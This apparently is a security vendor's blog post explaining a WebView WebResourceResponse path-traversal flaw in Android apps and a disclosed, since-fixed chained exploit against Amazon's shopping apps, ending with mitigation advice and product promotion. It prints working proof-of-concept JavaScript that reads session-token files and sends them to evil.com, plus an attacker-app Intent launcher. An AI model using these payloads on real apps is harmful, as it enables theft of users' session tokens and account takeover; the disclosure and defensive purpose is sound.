When it comes to vulnerabilities in WebViews, we often overlook the incorrect implementation of 

WebResourceResponse
 which is a WebView class that allows an Android app to emulate the server by returning a response (including a status code, content type, content encoding, headers and the response body) from the app’s code itself without making any actual requests to the server. At the end of the article, we’ll show how we exploited a vulnerability related to this in Amazon apps.

Do you want to check your mobile apps for such types of vulnerabilities? Oversecured mobile apps scanner provides an automatic solution that helps to detect vulnerabilities in Android and iOS mobile apps. You can integrate Oversecured into your development process and check every new line of your code to ensure your users are always protected.

Start securing your apps by starting a free 2-week trial from Quick Start, or you can book a call with our team or contact us to explore more.

What is 

WebResourceResponse
?

The WebView class in Android is used for displaying web content within an app, and provides extensive capabilities for manipulating requests and responses. It is a fancy web browser that allows developers, among other things, to bypass standard browser security. Any misuse of these features by a malicious actor can lead to vulnerabilities in mobile apps.

One of these features is that a WebView allows you to intercept app requests and return arbitrary content, which is implemented via the 

WebResourceResponse
 class.

Let’s look at a typical example of a 

WebResourceResponse
 implementation:

WebView webView = findViewById(R.id.webView);
webView.setWebViewClient(new WebViewClient() {
   public WebResourceResponse shouldInterceptRequest(WebView view, WebResourceRequest request) {
       Uri uri = request.getUrl();
       if (uri.getPath().startsWith("/local_cache/")) {
           File cacheFile = new File(getCacheDir(), uri.getLastPathSegment());
           if (cacheFile.exists()) {
               InputStream inputStream;
               try {
                   inputStream = new FileInputStream(cacheFile);
               } catch (IOException e) {
                   return null;
               }
               Map<String, String> headers = new HashMap<>();
               headers.put("Access-Control-Allow-Origin", "*");
               return new WebResourceResponse("text/html", "utf-8", 200, "OK", headers, inputStream);
           }
       }
       return super.shouldInterceptRequest(view, request);
   }
});

As you can see in the code above, if the request URI matches a given pattern, then the response is returned from the app resources or local files. The problem arises when an attacker can manipulate the path of the returned file and, through XHR requests, gain access to arbitrary files.

Therefore, if an attacker discovers a simple XSS or the ability to open arbitrary links inside the Android app, they can use that to leak sensitive user data – which can also include the access token, leading to a full account takeover.

Proof of Concept for an attack

If you already have the ability to execute arbitrary JavaScript code inside a vulnerable WebView, and assuming there is some sensitive data in 

/data/data/com.victim/shared_prefs/auth.xml
, then the Proof of Concept for the attack will look like this:

<!DOCTYPE html>
<html>
<head>
   <title>Evil page</title>
</head>
<body>
<script type="text/javascript">
   function theftFile(path, callback) {
     var oReq = new XMLHttpRequest();

     oReq.open("GET", "https://any.domain/local_cache/..%2F" + encodeURIComponent(path), true);
     oReq.onload = function(e) {
       callback(oReq.responseText);
     }
     oReq.onerror = function(e) {
       callback(null);
     }
     oReq.send();
   }

   theftFile("shared_prefs/auth.xml", function(contents) {
       location.href = "https://evil.com/?data=" + encodeURIComponent(contents);
   });
</script>
</body>
</html>

It should be noted that the attack works because 

new File(getCacheDir(), uri.getLastPathSegment())
 is being used to generate the path and the method 
Uri.getLastPathSegment()
 returns a decoded value.

However, policies like CORS still work inside a WebView. Therefore, if 

Access-Control-Allow-Origin: *
 is not specified in the headers, then requests to the current domain will not be allowed. In our example, this restriction will not affect the exploitation of path traversal, because 
any.domain
 can be replaced with the current scheme + host + port.

An overview of the vulnerability in Amazon’s apps

We scanned the Amazon Shopping and Amazon India Online Shopping apps and found two vulnerabilities. They were chained to access arbitrary files owned by Amazon apps and then reported to the Amazon VRP on December 21st, 2019. The issues were confirmed fixed by Amazon on April 6th, 2020.

  • The first was opening arbitrary URLs within the WebView through the 
    com.amazon.mShop.pushnotification.WebNotificationsSettingsActivity
    activity:

– and the second was stealing arbitrary files via 

WebResourceResponse
 in the 
com/amazon/mobile/mash/MASHWebViewClient.java
 file:

Two checks take place in the 

com/amazon/mobile/mash/handlers/LocalAssetHandler.java
 file:

One is in the 

shouldHandlePackage
 method:

public boolean shouldHandlePackage(UrlWebviewPackage pkg) {
       return pkg.getUrl().startsWith("https://app.local/");
   }

And the second is in the 

handlePackage
 handler:

public WebResourceResponse handlePackage(UrlWebviewPackage pkg) {
       InputStream stm;
       Uri uri = Uri.parse(pkg.getUrl());
       String path = uri.getPath().substring(1);
       try {
           if (path.startsWith("assets/")) {
               stm = pkg.getWebView().getContext().getResources().getAssets().open(path.substring("assets/".length()));
           } else if (path.startsWith("files/")) {
               stm = new FileInputStream(path.substring("files/".length())); // path to an arbitrary file
           } else {
               MASHLog.m2345v(TAG, "Unexpected path " + path);
               stm = null;
           }
           //...
           Map<String, String> headers = new HashMap<>();
           headers.put("Cache-Control", "max-age=31556926");
           headers.put("Access-Control-Allow-Origin", "*");
           return new WebResourceResponse(mimeType, null, 200, "OK", headers, stm);
       } catch (IOException e) {
           MASHLog.m2346v(TAG, "Failed to load resource " + uri, e);
           return null;
       }
   }


Proof of Concept for Amazon

Keeping the above-mentioned vulnerabilities and checks in mind, the attacker’s app looked like this:

String file = "/sdcard/evil.html";
   try {
       InputStream i = getAssets().open("evil.html");
       OutputStream o = new FileOutputStream(file);
       IOUtils.copy(i, o);
       i.close();
       o.close();
   } catch (Exception e) {
       throw new RuntimeException(e);
   }

   Intent intent = new Intent();
   intent.setClassName("in.amazon.mShop.android.shopping", "com.amazon.mShop.pushnotification.WebNotificationsSettingsActivity");
   intent.putExtra("MASHWEBVIEW_URL", "file://www.amazon.in" + file + "#/data/data/in.amazon.mShop.android.shopping/shared_prefs/DataStore.xml");
   startActivity(intent);

The apps also had a host check that was bypassed by us. This check could also be bypassed using the 

javascript:
 scheme which removed any requirements to have SD card permissions for making a file.

The file 

evil.html
 contained the exploit code:

<!DOCTYPE html>
<html>
<head>
   <title>Evil</title>
</head>
<body>
<script type="text/javascript">
   function theftFile(path, callback) {
     var oReq = new XMLHttpRequest();

     oReq.open("GET", "https://app.local/files/" + path, true);
     oReq.onload = function(e) {
       callback(oReq.responseText);
     }
     oReq.onerror = function(e) {
       callback(null);
     }
     oReq.send();
   }

   theftFile(location.hash.substring(1), function(contents) {
       location.href = "https://evil.com/?data=" + encodeURIComponent(contents);
   });
</script>
</body>
</html>

As a result, on opening the attacker’s app, the 

DataStore.xml
 file containing the user’s session token was sent to the attacker’s server.

How to prevent this vulnerability

While implementing 

WebResourceResponse
, it is recommended to use 
WebViewAssetLoader
, which is a user-friendly interface. It allows the app to safely process data from resources, assets or a predefined directory.

It could be challenging to keep track of security, especially in large projects. You can use Oversecured vulnerability scanner since it tracks all known security issues on Android and iOS including all the vectors mentioned above. To begin testing your apps, use Quick Startbook a call or contact us.